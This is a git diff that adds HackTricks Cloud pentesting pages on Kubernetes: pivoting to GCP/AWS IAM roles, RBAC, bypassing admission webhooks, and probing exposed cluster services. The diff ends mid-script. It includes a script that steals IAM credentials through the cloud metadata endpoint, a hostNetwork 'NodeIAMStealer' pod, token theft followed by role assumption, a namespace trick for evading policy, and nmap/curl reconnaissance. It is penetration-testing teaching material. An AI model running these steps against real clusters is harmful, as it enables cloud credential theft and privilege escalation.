+### GKE Workload Identity
+
+With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
+
+The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate.
+
+* **Enable Workload Identity** on a new cluster
+
+{% code overflow="wrap" %}
+```bash
+gcloud container clusters update <cluster_name> \
+    --region=us-central1 \
+    --workload-pool=<project-id>.svc.id.goog
+```
+{% endcode %}
+
+* **Create/Update a new nodepool** (Autopilot clusters don't need this)
+
+{% code overflow="wrap" %}
+```bash
+# You could update instead of create
+gcloud container node-pools create <nodepoolname> --cluster=<cluser_name> --workload-metadata=GKE_METADATA --region=us-central1
+```
+{% endcode %}
+
+* Create the **GCP Service Account to impersonate** from K8s with GCP permissions:
+
+{% code overflow="wrap" %}
+```bash
+# Create SA called "gsa2ksa"
+gcloud iam service-accounts create gsa2ksa --project=<project-id>
+
+# Give "roles/iam.securityReviewer" role to the SA
+gcloud projects add-iam-policy-binding <project-id> \
+    --member "serviceAccount:gsa2ksa@<project-id>.iam.gserviceaccount.com" \
+    --role "roles/iam.securityReviewer"
+```
+{% endcode %}
+
+* **Connect** to the **cluster** and **create** the **service account** to use
+
+{% code overflow="wrap" %}
+```bash
+# Get k8s creds
+gcloud container clusters get-credentials <cluster_name> --region=us-central1
+
+# Generate our testing namespace
+kubectl create namespace testing
+
+# Create the KSA
+kubectl create serviceaccount ksa2gcp -n testing
+```
+{% endcode %}
+
+* **Bind the GSA with the KSA**
+
+{% code overflow="wrap" %}
+```bash
+# Allow the KSA to access the GSA in GCP IAM
+gcloud iam service-accounts add-iam-policy-binding gsa2ksa@<project-id.iam.gserviceaccount.com \
+    --role roles/iam.workloadIdentityUser \
+    --member "serviceAccount:<project-id>.svc.id.goog[<namespace>/ksa2gcp]"
+
+# Indicate to K8s that the SA is able to impersonate the GSA
+kubectl annotate serviceaccount ksa2gcp \
+    --namespace testing \
+    iam.gke.io/gcp-service-account=gsa2ksa@security-devbox.iam.gserviceaccount.com
+```
+{% endcode %}
+
+* Run a **pod** with the **KSA** and check the **access** to **GSA:**
+
+```bash
+# If using Autopilot remove the nodeSelector stuff!
+echo "apiVersion: v1
+kind: Pod
+metadata:
+  name: workload-identity-test
+  namespace: <namespace>
+spec:
+  containers:
+  - image: google/cloud-sdk:slim
+    name: workload-identity-test
+    command: ['sleep','infinity']
+  serviceAccountName: ksa2gcp
+  nodeSelector:
+    iam.gke.io/gke-metadata-server-enabled: 'true'" | kubectl apply -f-
+
+# Get inside the pod
+kubectl exec -it workload-identity-test \
+  --namespace testing \
+  -- /bin/bash
+
+# Check you can access the GSA from insie the pod with
+curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email
+gcloud auth list
+```
+
+Check the following command to authenticate in case needed:
+
+{% code overflow="wrap" %}
+```bash
+gcloud auth activate-service-account --key-file=/var/run/secrets/google/service-account/key.json
+```
+{% endcode %}
+
+{% hint style="warning" %}
+As an attacker inside K8s you should **search for SAs** with the **`iam.gke.io/gcp-service-account` annotation** as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.\
+From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**.
+{% endhint %}
+
+This is a script to easily **iterate over the all the pods** definitions **looking** for that **annotation**:
+
+```bash
+for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
+    for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
+        echo "Pod: $ns/$pod"
+        kubectl get pod "$pod" -n "$ns" -o yaml | grep "gcp-service-account"
+        echo ""
+        echo ""
+    done
+done | grep -B 1 "gcp-service-account"
+```
+
+## AWS
+
+### Kiam & Kube2IAM (IAM role for Pods) <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>
+
+An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it.
+
+First of all you need to configure **which roles can be accessed inside the namespace**, and you do that with an annotation inside the namespace object:
+
+{% code title="Kiam" %}
+```yaml
+kind: Namespace
+metadata:
+  name: iam-example
+  annotations:
+    iam.amazonaws.com/permitted: ".*"
+```
+{% endcode %}
+
+{% code title="Kube2iam" %}
+```yaml
+apiVersion: v1
+kind: Namespace
+metadata:
+  annotations:
+    iam.amazonaws.com/allowed-roles: |
+      ["role-arn"]
+  name: default
+```
+{% endcode %}
+
+Once the namespace is configured with the IAM roles the Pods can have you can **indicate the role you want on each pod definition with something like**:
+
+{% code title="Kiam & Kube2iam" %}
+```yaml
+kind: Pod
+metadata:
+  name: foo
+  namespace: external-id-example
+  annotations:
+    iam.amazonaws.com/role: reportingdb-reader
+```
+{% endcode %}
+
+{% hint style="warning" %}
+As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles).
+{% endhint %}
+
+#### Create Pod with IAM Role
+
+{% hint style="info" %}
+The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
+{% endhint %}
+
+```yaml
+echo 'apiVersion: v1
+kind: Pod
+metadata:
+  annotations:
+    iam.amazonaws.com/role: transaction-metadata
+  name: alpine
+  namespace: eevee
+spec:
+  containers:
+  - name: alpine
+    image: alpine
+    command: ["/bin/sh"]
+    args: ["-c", "sleep 100000"]' | kubectl apply -f -
+```
+
+### IAM Role for K8s Service Accounts via OIDC <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>
+
+This is the **recommended way by AWS**.
+
+1. First of all you need to [create an OIDC provider for the cluster](https://docs.aws.amazon.com/eks/latest/userguide/enable-iam-roles-for-service-accounts.html).
+2. Then you create an IAM role with the permissions the SA will require.
+3. Create a [trust relationship between the IAM role and the SA](https://docs.aws.amazon.com/eks/latest/userguide/associate-service-account-role.html) name (or the namespaces giving access to the role to all the SAs of the namespace). _The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name_.
+4. Finally, **create a SA with an annotation indicating the ARN of the role**, and the pods running with that SA will have **access to the token of the role**. The **token** is **written** inside a file and the path is specified in **`AWS_WEB_IDENTITY_TOKEN_FILE`** (default: `/var/run/secrets/eks.amazonaws.com/serviceaccount/token`)
+
+```bash
+# Create a service account with a role
+cat >my-service-account.yaml <<EOF
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: my-service-account
+  namespace: default
+  annotations:
+    eks.amazonaws.com/role-arn: arn:aws:iam::318142138553:role/EKSOIDCTesting
+EOF
+kubectl apply -f my-service-account.yaml
+
+# Add a role to an existent service account
+kubectl annotate serviceaccount -n $namespace $service_account eks.amazonaws.com/role-arn=arn:aws:iam::$account_id:role/my-role
+```
+
+To **get aws using the token** from `/var/run/secrets/eks.amazonaws.com/serviceaccount/token` run:
+
+{% code overflow="wrap" %}
+```bash
+aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/EKSOIDCTesting --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
+```
+{% endcode %}
+
+{% hint style="warning" %}
+As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token.
+
+Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.**
+{% endhint %}
+
+{% hint style="danger" %}
+Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role.
+
+Check the **following page for more information**:
+{% endhint %}
+
+{% content-ref url="../aws-security/aws-basic-information/aws-federation-abuse.md" %}
+[aws-federation-abuse.md](../aws-security/aws-basic-information/aws-federation-abuse.md)
+{% endcontent-ref %}
+
+### Find Pods a SAs with IAM Roles in the Cluster
+
+This is a script to easily **iterate over the all the pods and sas** definitions **looking** for that **annotation**:
+
+```bash
+for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
+    for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
+        echo "Pod: $ns/$pod"
+        kubectl get pod "$pod" -n "$ns" -o yaml | grep "amazonaws.com"
+        echo ""
+        echo ""
+    done
+    for sa in `kubectl get serviceaccounts -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
+        echo "SA: $ns/$sa"
+        kubectl get serviceaccount "$sa" -n "$ns" -o yaml | grep "amazonaws.com"
+        echo ""
+        echo ""
+    done
+done | grep -B 1 "amazonaws.com"
+```
+
+### Node IAM Role
+
+The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
+
+There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network:
+
+```bash
+kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
+```
+
+### Steal IAM Role Token
+
+Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it.
+
+You can use the following script to **steal** your new hard worked **IAM role credentials**:
+
+```bash
+IAM_ROLE_NAME=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || wget  http://169.254.169.254/latest/meta-data/iam/security-credentials/ -O - 2>/dev/null)
+if [ "$IAM_ROLE_NAME" ]; then
+    echo "IAM Role discovered: $IAM_ROLE_NAME"
+    if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then
+        echo "Credentials:"
+        curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" 2>/dev/null || wget "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" -O - 2>/dev/null
+    fi
+fi
+```
+
+## References
+
+* [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)
+* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
+* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md b/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
new file mode 100644
index 0000000000..4c5e3aa00c
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
@@ -0,0 +1,200 @@
+# Kubernetes Role-Based Access Control(RBAC)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Role-Based Access Control (RBAC)
+
+Kubernetes has an **authorization module named Role-Based Access Control** ([**RBAC**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)) that helps to set utilization permissions to the API server.
+
+RBAC’s permission model is built from **three individual parts**:
+
+1. **Role\ClusterRole ­–** The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource.
+2. **Subject (User, Group or ServiceAccount) –** The object that will receive the permissions.
+3. **RoleBinding\ClusterRoleBinding –** The connection between Role\ClusterRole and the subject.
+
+![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebiding_serviceaccount_and_role-1024x551.png)
+
+The difference between “**Roles**” and “**ClusterRoles**” is just where the role will be applied – a “**Role**” will grant access to only **one** **specific** **namespace**, while a “**ClusterRole**” can be used in **all namespaces** in the cluster. Moreover, **ClusterRoles** can also grant access to:
+
+* **cluster-scoped** resources (like nodes).
+* **non-resource** endpoints (like /healthz).
+* namespaced resources (like Pods), **across all namespaces**.
+
+From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like:
+
+```
+kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options
+```
+
+## Templates
+
+In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role:
+
+* The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_.
+* The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true`
+* The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource.
+
+### Rules Verbs
+
+(_This info was taken from_ [_**the docs**_](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb))
+
+| HTTP verb | request verb                                                                                                                                                  |
+| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| POST      | create                                                                                                                                                        |
+| GET, HEAD | get (for individual resources), list (for collections, including full object content), watch (for watching an individual resource or collection of resources) |
+| PUT       | update                                                                                                                                                        |
+| PATCH     | patch                                                                                                                                                         |
+| DELETE    | delete (for individual resources), deletecollection (for collections)                                                                                         |
+
+Kubernetes sometimes checks authorization for additional permissions using specialized verbs. For example:
+
+* [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+  * `use` verb on `podsecuritypolicies` resources in the `policy` API group.
+* [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping)
+  * `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group.
+* [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/)
+  * `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group.
+
+{% hint style="warning" %}
+You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide`
+{% endhint %}
+
+### Examples
+
+{% code title="Role" %}
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  namespace: defaultGreen
+  name: pod-and-pod-logs-reader
+rules:
+- apiGroups: [""]
+  resources: ["pods", "pods/log"]
+  verbs: ["get", "list", "watch"]
+```
+{% endcode %}
+
+{% code title="ClusterRole" %}
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  # "namespace" omitted since ClusterRoles are not namespaced
+  name: secret-reader
+rules:
+- apiGroups: [""]
+  resources: ["secrets"]
+  verbs: ["get", "watch", "list"]
+```
+{% endcode %}
+
+For example you can use a **ClusterRole** to allow a particular user to run:
+
+```
+kubectl get pods --all-namespaces
+```
+
+### **RoleBinding and ClusterRoleBinding**
+
+[**From the docs:**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#rolebinding-and-clusterrolebinding) A **role binding grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**.
+
+{% code title="" %}
+```yaml
+piVersion: rbac.authorization.k8s.io/v1
+# This role binding allows "jane" to read pods in the "default" namespace.
+# You need to already have a Role named "pod-reader" in that namespace.
+kind: RoleBinding
+metadata:
+  name: read-pods
+  namespace: default
+subjects:
+# You can specify more than one "subject"
+- kind: User
+  name: jane # "name" is case sensitive
+  apiGroup: rbac.authorization.k8s.io
+roleRef:
+  # "roleRef" specifies the binding to a Role / ClusterRole
+  kind: Role #this must be Role or ClusterRole
+  name: pod-reader # this must match the name of the Role or ClusterRole you wish to bind to
+  apiGroup: rbac.authorization.k8s.io
+```
+{% endcode %}
+
+{% code title="ClusterRoleBinding" %}
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+# This cluster role binding allows anyone in the "manager" group to read secrets in any namespace.
+kind: ClusterRoleBinding
+metadata:
+  name: read-secrets-global
+subjects:
+- kind: Group
+  name: manager # Name is case sensitive
+  apiGroup: rbac.authorization.k8s.io
+roleRef:
+  kind: ClusterRole
+  name: secret-reader
+  apiGroup: rbac.authorization.k8s.io
+```
+{% endcode %}
+
+**Permissions are additive** so if you have a clusterRole with “list” and “delete” secrets you can add it with a Role with “get”. So be aware and test always your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.**
+
+## **Enumerating RBAC**
+
+```bash
+# Get current privileges
+kubectl auth can-i --list
+# use `--as=system:serviceaccount:<namespace>:<sa_name>` to impersonate a service account
+
+# List Cluster Roles
+kubectl get clusterroles
+kubectl describe clusterroles
+
+# List Cluster Roles Bindings
+kubectl get clusterrolebindings
+kubectl describe clusterrolebindings
+
+# List Roles
+kubectl get roles
+kubectl describe roles
+
+# List Roles Bindings
+kubectl get rolebindings
+kubectl describe rolebindings
+```
+
+### Abuse Role/ClusterRoles for Privilege Escalation
+
+{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md b/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
new file mode 100644
index 0000000000..512cbbab37
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
@@ -0,0 +1,104 @@
+# Kubernetes ValidatingWebhookConfiguration
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Definition
+
+ValidatingWebhookConfiguration is a Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints.
+
+## Purpose
+
+The purpose of a ValidatingWebhookConfiguration is to define a validating webhook that will enforce a set of predefined rules and constraints on incoming Kubernetes API requests. The webhook will validate the requests against the rules and constraints defined in the configuration, and will return an error if the request does not conform to the rules.
+
+**Example**
+
+Here is an example of a ValidatingWebhookConfiguration:
+
+```yaml
+apiVersion: admissionregistration.k8s.io/v1
+kind: ValidatingWebhookConfiguration
+metadata:
+  name: example-validation-webhook
+  namespace: default
+webhook:
+  name: example-validation-webhook
+  clientConfig:
+    url: https://example.com/webhook
+    serviceAccountName: example-service-account
+  rules:
+  - apiGroups:
+    - ""
+    apiVersions:
+    - "*"
+    operations:
+    - CREATE
+    - UPDATE
+    resources:
+    - pods
+```
+
+The main difference between a ValidatingWebhookConfiguration and policies :&#x20;
+
+
+
+<figure><img src="../../.gitbook/assets/Kyverno.png" alt=""><figcaption><p>Kyverno.png</p></figcaption></figure>
+
+* **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints.
+* **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services
+
+## Enumeration
+
+```
+$ kubectl get ValidatingWebhookConfiguration
+```
+
+### Abusing Kyverno and Gatekeeper VWC
+
+As we can see all operators installed have at least one ValidatingWebHookConfiguration(VWC).
+
+**Kyverno** and **Gatekeeper** are both Kubernetes policy engines that provide a framework for defining and enforcing policies across a cluster.
+
+Exceptions refer to specific rules or conditions that allow a policy to be bypassed or modified under certain circumstances but this is not the only way !
+
+For **kyverno**, as you as there is a validating policy, the webhook `kyverno-resource-validating-webhook-cfg` is populated.
+
+For Gatekeeper, there is `gatekeeper-validating-webhook-configuration` YAML file.
+
+Both come from with default values but the Administrator teams might updated those 2 files.
+
+### Use Case
+
+```bash
+$ kubectl get validatingwebhookconfiguration kyverno-resource-validating-webhook-cfg -o yaml
+```
+
+Now, identify the following output :
+
+```yaml
+namespaceSelector:
+    matchExpressions:
+    - key: kubernetes.io/metadata.name
+      operator: NotIn
+      values:
+      - default
+      - TEST
+      - YOYO
+      - kube-system
+      - MYAPP
+```
+
+Here, `kubernetes.io/metadata.name` label refers to the namespace name. Namespaces with names in the `values` list will be excluded from the policy :
+
+Check namespaces existence. Sometimes, due to automation or misconfiguration, some namespaces might have not been created. If you have permission to create namespace, you could create a namespace with a name in the `values` list and policies won't apply your new namespace.
+
+The goal of this attack is to exploit **misconfiguration** inside VWC in order to bypass operators restrictions and then elevate your privileges with other techniques
+
+{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+## References
+
+* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+* [https://kyverno.io/](https://kyverno.io/)
+* [https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)
diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md b/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
new file mode 100644
index 0000000000..a12955aa1c
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
@@ -0,0 +1,239 @@
+# Pentesting Kubernetes Services
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**.
+
+## Finding exposed pods with OSINT
+
+One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh) to find subdomains related to kubernetes. Another way might be to search `"k8s.%.com"` in github and search for **YAML files** containing the string.
+
+## How Kubernetes Exposes Services
+
+It might be useful for you to understand how Kubernetes can **expose services publicly** in order to find them:
+
+{% content-ref url="../exposing-services-in-kubernetes.md" %}
+[exposing-services-in-kubernetes.md](../exposing-services-in-kubernetes.md)
+{% endcontent-ref %}
+
+## Finding Exposed pods via port scanning
+
+The following ports might be open in a Kubernetes cluster:
+
+| Port            | Process        | Description                                                            |
+| --------------- | -------------- | ---------------------------------------------------------------------- |
+| 443/TCP         | kube-apiserver | Kubernetes API port                                                    |
+| 2379/TCP        | etcd           |                                                                        |
+| 6666/TCP        | etcd           | etcd                                                                   |
+| 4194/TCP        | cAdvisor       | Container metrics                                                      |
+| 6443/TCP        | kube-apiserver | Kubernetes API port                                                    |
+| 8443/TCP        | kube-apiserver | Minikube API port                                                      |
+| 8080/TCP        | kube-apiserver | Insecure API port                                                      |
+| 10250/TCP       | kubelet        | HTTPS API which allows full mode access                                |
+| 10255/TCP       | kubelet        | Unauthenticated read-only HTTP port: pods, running pods and node state |
+| 10256/TCP       | kube-proxy     | Kube Proxy health check server                                         |
+| 9099/TCP        | calico-felix   | Health check server for Calico                                         |
+| 6782-4/TCP      | weave          | Metrics and endpoints                                                  |
+| 30000-32767/TCP | NodePort       | Proxy to the services                                                  |
+| 44134/TCP       | Tiller         | Helm service listening                                                 |
+
+### Nmap
+
+{% code overflow="wrap" %}
+```bash
+nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <pod_ipaddress>/16
+```
+{% endcode %}
+
+### Kube-apiserver
+
+This is the **API Kubernetes service** the administrators talks with usually using the tool **`kubectl`**.
+
+**Common ports: 6443 and 443**, but also 8443 in minikube and 8080 as insecure.
+
+```bash
+curl -k https://<IP Address>:(8|6)443/swaggerapi
+curl -k https://<IP Address>:(8|6)443/healthz
+curl -k https://<IP Address>:(8|6)443/api/v1
+```
+
+**Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:**
+
+{% content-ref url="../kubernetes-enumeration.md" %}
+[kubernetes-enumeration.md](../kubernetes-enumeration.md)
+{% endcontent-ref %}
+
+### Kubelet API
+
+This service **run in every node of the cluster**. It's the service that will **control** the pods inside the **node**. It talks with the **kube-apiserver**.
+
+If you find this service exposed you might have found an **unauthenticated RCE**.
+
+#### Kubelet API
+
+```bash
+curl -k https://<IP address>:10250/metrics
+curl -k https://<IP address>:10250/pods
+```
+
+If the response is `Unauthorized` then it requires authentication.
+
+If you can list nodes you can get a list of kubelets endpoints with:
+
+```bash
+kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do
+    ip=$(echo $node | awk '{print $1}')
+    port=$(echo $node | awk '{print $2}')
